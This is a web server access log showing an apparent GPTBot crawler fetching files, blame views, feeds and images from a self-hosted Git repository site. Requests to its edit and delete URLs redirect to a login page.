"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 31682] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" +[17/Feb/2026:17:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:17:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 11706] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 215878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 436304] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" +[17/Feb/2026:17:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 16196] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 1949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 1984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 3799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:07:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:07:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:17:07:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:07:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 12560] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images" [Client 74.7.227.38] [Length 11413] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" +[17/Feb/2026:17:07:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14567] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 15294] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14742] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14742] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14744] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16203] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16205] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:07:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 11104] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:07:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:07:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:07:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:07:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 9856] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 11875] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 11118] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 11119] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 11110] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 11096] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 11184] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] 